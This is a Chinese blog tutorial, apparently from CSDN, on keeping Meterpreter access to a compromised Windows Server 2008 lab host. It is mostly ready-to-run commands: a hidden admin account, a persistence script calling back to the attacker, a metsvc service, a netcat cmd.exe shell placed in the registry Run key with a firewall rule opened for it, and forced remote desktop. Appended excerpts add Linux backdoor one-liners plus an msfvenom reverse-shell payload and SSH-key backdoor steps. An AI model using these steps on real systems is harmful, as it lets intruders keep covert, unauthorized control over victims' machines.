12.3、后渗透测试--持久化后门

最新推荐文章于 2025-04-08 08:00:00 发布
最新推荐文章于 2025-04-08 08:00:00 发布
阅读量3.5k 收藏 43
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: metasploit meterpreter 持久化后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/leiwuhen92/article/details/128303712
攻击主机: Kali 192.168.11.106
靶机:windows server 2008 r2   192.168.11.134
 

零、为何要创建后门

当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如 重新启动计算机,此时使用后门将允许自动重新与目标系统建立连 接, 不必每次都需要进行攻击取得 meterpreter 为了后续渗透方便,所以需要创建一个后门。这样,即使连接被中断,也不会影响工作。下面将介绍创建持久后门的几种方式。
前提: 获得 meterpreter shell
创建后门的几种方式:
  1. 靶机创建隐藏用户,后期可直接使用隐藏用户登录目标主机;
  2. 通过persistence脚本安装后门;
  3. 通过metsvc服务的方式;
  4. 持久化后门netcat
  5. 通过开启远程桌面

一、靶机创建隐藏用户

1、进入靶机 
meterpreter > shell
2.创建用户 注意这里用户使用了$符号,可以起到隐藏创建用户的目的
C:\Windows\system32>  net user hacker$ Hacker_123  /add
3、将创建的用户添加到管理员组
C:\Windows\system32>  net localgroup administrators hacker$  /add
net user查看不到hacker$用户,但在靶机上还是能看到你创建的这个隐藏用户:

 可以使用hacker$/Hacker_123这个用户登录到靶机。

二、通过persistence脚本安装后门

路径:  metasploit/scripts/meterpreter/persistence.rb  ,用于创建通过启动项启动。会创建注册表,创建文件,  很容易被杀软拦截 
帮助文档:
1、执行 run persistence -S -U -X  -i  5 -p 8888 -r  192.168.11.106  这样靶机在系统登陆,用户登陆,开机,使用中每隔5秒都 会自动连接攻击机 192.168.11.106 8888 端口,缺点是容易被杀毒软件查杀
2、执行结束后,会在靶机 的C:/windows/Temp/下建立一个vbs文件( 持久脚本 ),该脚本会 自动在靶机上运行,同时 添加注册表键值 ,如下 :
3、我们下次可直接在kail攻击机器上使用下面的漏洞利用模块和攻击载荷攻击,获取靶机的meterpreter, 必须先 将靶机重启
kail攻击机器输入如下指令:
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.11.106
> set LPORT 8888    #    端口要和上面的persistence后门端口一致
> run
运行后,可以成功获得meterpreter shell:

三、通过metsvc服务的方式

路径:  metasploit/scripts/meterpreter/metsvc.rb  ,用于创建服务启动。会创建名为meterpreter的服务 ,并 在C:\Users***\AppData\Local\Temp\上传三个文件 (metsrv.x86.dll、metsvc-server.exe、metsvc.exe)   很容易被杀软拦截,且安装服务需要管理员权限 
1、运行 run metsvc将会在靶机上以Meterpreter服务的形式注册到服务列表中,并开机自动启动。
运行 run metsvc -r卸载靶机上的Meterpreter服务。
查看服务已启动:
查看进程:
端口也是启动的状态:

 这些说明靶机上已经开始监听31337端口了。

2、我们下次可直接在kail攻击机器上使用下面的漏洞利用模块和攻击载荷攻击,获取靶机的meterpreter, 必须先 将靶机重启
kail攻击机器输入如下指令:
> use exploit/multi/handler
set payload windows/metsvc_bind_tcp  指定的木马模块
set RHOST 192.168.11.134   # 靶机IP
> set LPORT 31337    # 靶机上监听的端口值31337
> run
这里一直会话每次刚创建成功就会断开, 推测是 run metsvc 被舍弃了,建议使用 exploit/windows/local/persistence。
使用 exploit/windows/local/persistence
必须先重启靶机,然后再kail攻击机器输入如下指令:
> use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp  
set LHOST 192.168.11.106  # 设置kail攻击机IP
> set LPORT 4444    # 跟 exploit/windows/local/persistence设置的LPORT相同
> run
运行后,可以成功获得meterpreter shell:

四、持久化后门netcat

nc(全称是netcat)是一个用于TCP/UDP连接和监听的linux工具。nc的实现版本大致有两种,一种是带有-e或-c 选项可以直接给出执行命令,另一种不支持-e选项。
ncat是nmap项目的一部分,在安装nmap的时候会自动安装ncat。ncat是对netcat的重新实现和升级,而且功能更加强大(如ssl加密、代理连接通过socks4 获取http)
nc的监听模式在kali下会出现问题,监听的端口会发生变化,因此推荐同学们在kali下使用ncat
1.1、 上传nc.exe至目标主机
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32  C:\\windows\\system32下的文件都有system权限(最高权限)
验证是否上传成功   ls C:\\windows\\system32 | grep nc.exe
execute -f  C:\\windows\\system32\\nc.exe -h
1.2、注册表自启动程序设置 
枚举查看注册表启动项
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
靶机上注册表该项的确没有任何值:
将nc.exe设置到注册表启动项中
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -ldp 4455 -e cmd.exe'
  • -L 选项或-l选项是将nc设置为监听模式;
  • -p 选项指定监听的端口(混淆为80,53等端口往往能穿透防火墙);
  • -e 选项可以绑定到cmd.exe这个shell程序。
查看以确定nc已经被设置到注册表启动项中
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
1.3、设置防火墙模式
打开cmdexecute -f cmd -i
当前防火墙操作模式 :netsh firewall show opmode
将nc开放的端口4455加入到目标系统防火墙规则中,入站 netsh advfirewall firewall add rule name=ncport4455  dir=in protocol = tcp action=allow localport=4455
查看目标系统防火墙端口开放状态: netsh firewall show portopening
1.4、nc连接靶机
在kail攻击机上: nc -v 192.168.11.134 4455
靶机重启后,页面弹出:
此时在kail攻击机上: nc -v 192.168.11.134 4455,ok

五、通过开启远程桌面

# 强制开启目标主机远程桌面并自动添加用户名为metasploit密码为 Meterpreter_123 的用户
run getgui -u metasploit -p Meterpreter_123 
# 上面命令会生成清理痕迹的ruby的脚本文件,位置在/root/.msf4/logs/scripts/getgui/clean_up_xxxxx.rc
# 当操作完目标用户后可以使用此脚本清理痕迹、关闭远程桌面服务和删除创建的用户
run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20221207.0010.rc
模块已舍弃,建议使用模块 run post/windows/manage/enable_rdp
靶机上查看用户:

 

在kail攻击机器上远程登录靶机: rdesktop -u metasploit -p Meterpreter_123 192.168.11.134:3389

六、参考

域内持久化后门
hongduilanjun的博客
11-01 563
可以使用krbtgt的NTLM hash创建作为任何用户的有效TGT。要伪造黄金票据的前提是知道域的SID和krbtgt账户的hash或者AES-256值。
meterpreter 持久后门
01-02 826
创建持久后门 当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如重新启动计算机,此时使用后门将允许自动重新与目标系统建立连接。为了后续渗透方便,所以需要创建一个后门。这样,即使连接被中断,也不会影响工作。下面将介绍创建持久后门。创建持久后门的具体操作步骤如下所示。 (1)激活Meterpreter会话。执行命令如下...
后门持久化与隐匿技术分析:原理、机制与实战演化
syg6921008的博客
04-08 1140
后门技术的终极目标从来不是“上线”,而是“沉默存活”。从入口投送、模块部署、免杀策略、行为隐藏,到最终的通信逃避与长期管理,构建一个真正意义上难以察觉、难以清理、难以中断的持久控制体系,才是红队实战中的王道。多节点联动的链式触发多平台切换的逻辑状态机多信道可选的自适应 Beacon多阶段模块的自动化加载管理“看不见的不是不存在,是已经与环境融为一体。愿你所布控的每一条链路,都能悄无声息、久久为功。
MSF之Persistence后门
weixin_46104215的博客
09-27 3283
Persistence:一款使用安装自动方式的持久后门程序,可以利用它创建注册和文件 一、实验环境 攻击主机:2021 Kali (ip:192.168.110.130) 靶机:win7(专业版) (ip:192.168.110.134) 准备:先通过攻击获取一个 meterpreter shell(之前的文章中有介绍的 ms17-010漏洞) 二、实验步骤 1.获得 meterpreter shell 之后,输入 run persistence -A -S -U...
linux 持久化后门
luguifang2011的专栏
01-18 3273
前言 收集复现下网上linux后门姿势,一起学习下。 这张图特别好 添加超级用户 某些情况下是没有回显的,可以用一句话直接添加用户 1、useradd guest;echo 'guest:123456'|chpasswd 2、useradd -p `openssl passwd 123456` guest 3、useradd -p "$(openssl passwd 12...
Linux持续化后门
小晓晓晓林的博客
02-20 3398
Linux权限维持 环境:Centos7、Kali虚拟机等 1、增加超级用户 useradd -p `openssl passwd -1 -salt 'salt' 123456` test -o -u 0 -g root -G root -s /bin/bash -d /home/test 通过命令创建了test 123456的超级用户 2、unix bash远...
Delphi 12.3 控件之RDOpenAI-demo-source.rar源代码
03-12
Delphi 12.3 控件之RDOpenAI-demo-source.rar源代码是针对使用Delphi开发环境的开发者提供的一个示例项目,它展示了如何集成和使用RDOpenAI控件。Delphi是一种广泛使用的集成开发环境(IDE),它允许开发者快速构建...
Delphi 12.3控件之DevExpressVCLProductDemos-24.2.3.rar
03-24
Delphi 12.3控件之DevExpressVCLProductDemos-24.2.3.rar
Delphi 12.3控件之UniGUI-1597(完整版 安装工具) DC.rar
03-26
Delphi 12.3控件之UniGUI_1597(完整版 安装工具) DC.rar
Delphi 12.3控件之DBISAM-450b6-xe11-12.7z
03-27
Delphi 12.3控件之DBISAM_450b6_xe11_12.7z
Delphi 12.3控件之uniGUI-1.95.0.1599.7z
最新发布
05-14
Delphi以其高效的编译器、可视化开发环境以及丰富的组件库而闻名,特别是在Windows平台下的应用程序开发中拥有广泛的用户基础。版本12.3是Delphi的一个较新版本,它标志着Embarcadero对Delphi功能的不断更新和改进。...
在Android中使用带有shell脚本的Kali Linux的持久后门
HTTPPTTH的博客
03-23 1003
此外,如果目标系统与我们在同一局域网中,或者我们拥有静态 IP,那么持久性将会一直存在于局域网或者广域网中,这也是我们需要注意的一个问题。在破解 Android 设备时,可以使用多种方法,但是一旦获得了meterpreter会话,该会话并不是持久的,需要将一个 shell 脚本上传到/sdcard目录的任何位置来实现持久后门。因此,我们需要使用另一种方法,即使用shell命令在/sdcard目录下上传一个后门,并执行脚本,该脚本会自动在该 Android 设备中创建持久后门。之后,需要在终端中输入“
linux持久化
HoAd'blog
08-25 1900
linux持久化后门添加超级用户SUID shellalias 后门inetdcrontab后门ssh公钥免密ssh软连接SSH wrapper后门PAM隐身登录隐藏文件Git hooksPROMPT_COMMAND后门PROMPT_COMMAND提权Sudoers “trick”TCP Wrappers进程注入其他一些小技巧bash去掉history记录修改上传文件时间戳伪造Apache日志中的指定IPLinux日志清除 添加超级用户 echo "user:x:0:0::/:/bin/sh" >&g
持久化:利用Linux PAM创建后门
qq_68163788的博客
02-19 1837
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块化框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义的PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义的PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
持久化:Linux利用SUID、任务计划、vim进行权限维持
qq_68163788的博客
02-17 1452
以利用SUID(Set User ID)权限来实现权限维持。通过设置SUID权限,用户可以以文件所有者的身份执行该文件,从而获取文件所有者的权限。这样可以帮助攻击者在系统中保持持久权限。另外,任务计划(Cron Jobs)也是一种常见的权限维持方法。攻击者可以通过创建定时任务,定期执行恶意脚本或程序来维持权限。此外,vim编辑器也可以被用来进行权限维持。攻击者可以利用vim编辑器的漏洞来提升自己的权限或执行恶意代码。
渗透测试实战之WMI持久化记录
anquanzushiye的博客
02-01 1724
0x00 背景WMI(Windows Management Instrumentation,Windows 管理规范)是一项核心的 Windows 管理技术;用户可以使用 WMI 管理本...
Kali 中 Persistence后门的使用
大方子
09-02 3673
这里我就用最经典的漏洞ms08_067进行演示   靶机:192.168.193.128 攻击机:192.168.193.135   这里我就省去ms08_067漏洞的使用过程,直接讲当ms08_067拿到shell之后的操作   这里我们已经拿到权限了   然后执行 run persistence -S -U -X -i 5 -p 446 -r 192.168.193.13...
metasploit---创建后门
孤的博客
11-22 857
后门技术来维持对被攻击系统的访问。后门可帮助攻击者维持系统访问,并使攻击者无须重复地实施攻击就能随意使用被攻击系统。后门就是就是绕过正常的计算机机制,获取计算机访问权限的方法。 常见EXE后门 metasploit提供了三个辅助工具来创建payload后门,分别是msfpayload、msfencode以及msfvenom,不过现在只有msfvenom(里面集成了msfpayload和msfenc...
kali后门设置
03-09
<think>好的,我现在需要回答用户关于如何在Kali Linux中设置后门的问题。首先,我得确保自己正确理解用户的需求。用户可能想了解渗透测试中常用的后门设置方法,用于安全评估。需要注意的是,这些技术只能用于合法授权的测试,未经允许使用是非法的。 接下来,我应该回忆Kali Linux中常用的工具。Metasploit Framework 是最常用的渗透测试工具之一,生成Payload和设置监听器是常见做法。还有像MSFVenom这样的工具可以生成不同类型的后门程序。此外,SSH后门也是一种常见方法,通过添加授权密钥或修改配置保持访问权限。 然后,我需要考虑用户可能的疑问点。比如,如何生成Payload,如何设置监听器,如何维持持久访问,以及如何避免被检测。同时,用户可能对后门的类型和适用场景不太清楚,需要简要说明。 根据提供的引用内容,引用[1]提到了SSH隧道和端口转发,引用[3]和[4]涉及Metasploit的使用,这可能与生成Payload有关。引用[4]提到MS12-020漏洞,但用户的问题是关于后门设置,所以重点可能在Metasploit的利用模块和后门生成。 现在,我需要整理步骤。首先使用MSFVenom生成Payload,然后设置Metasploit的监听器。接着,通过执行Payload获得反向连接。另外,SSH后门的方法也是可行的,比如添加SSH密钥或修改sshd配置。最后,可能需要考虑持久化机制,如cron任务或启动脚本。 需要注意的是,每个步骤都需要具体命令示例,并且提醒用户合法使用的必要性。此外,生成的相关问题应围绕后门检测、加固措施、持久化技术和其他工具方法展开。 检查是否有遗漏点,比如Payload的类型(如exe、Python脚本等),以及如何将后门传播到目标机器。用户可能需要知道如何诱使目标执行Payload,但这可能超出当前问题范围,但可以简要提及。 最后,确保回答结构清晰,分步骤说明,代码块正确使用$$格式,引用正确标注。例如,Metasploit的安装和启动命令来自引用[3],SSH隧道的例子来自引用[1]。 总结回答应包括:生成Payload、设置监听器、执行Payload、持久化后门(SSH方法)、注意事项和相关问题。</think>### Kali Linux中设置后门的步骤 在Kali Linux中设置后门通常用于渗透测试的权限维持阶段,以下是两种常见方法: --- #### **方法1:使用Metasploit生成反向Shell后门** 1. **生成Payload** 使用`msfvenom`创建恶意程序(如可执行文件或Python脚本): ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击者IP> LPORT=<监听端口> -f exe > backdoor.exe ``` 参数说明: - `-p`: 指定Payload类型(如`windows/meterpreter/reverse_tcp`) - `LHOST/LPORT`: 攻击者的IP和监听端口 - `-f`: 输出格式(如`exe`、`python`等)[^3][^4]。 2. **设置Metasploit监听器** 启动Metasploit并配置反向TCP处理模块: ```bash msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <攻击者IP> set LPORT <监听端口> exploit ``` 此步骤等待目标机器执行后门程序并建立连接[^3][^4]。 3. **触发后门** 将生成的`backdoor.exe`通过钓鱼邮件、U盘等方式投放到目标机器并执行。成功后,攻击者会获得Meterpreter会话,可执行文件操作、键盘记录等。 --- #### **方法2:SSH后门(适用于Linux目标)** 1. **添加SSH公钥** 在目标机器的`~/.ssh/authorized_keys`文件中插入攻击者的公钥: ```bash echo "ssh-rsa <攻击者公钥>" >> ~/.ssh/authorized_keys ``` 此后可通过`ssh user@目标IP`直接登录[^1]。 2. **修改SSH服务配置** 编辑`/etc/ssh/sshd_config`,启用以下选项以维持持久访问: ```bash PermitRootLogin yes PasswordAuthentication yes ``` 重启SSH服务:`systemctl restart sshd`。 --- #### **注意事项** - 后门程序可能被防病毒软件检测,需进行混淆或加密(如使用`Veil-Evasion`工具)。 - 所有操作需在合法授权范围内进行,禁止非法使用[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值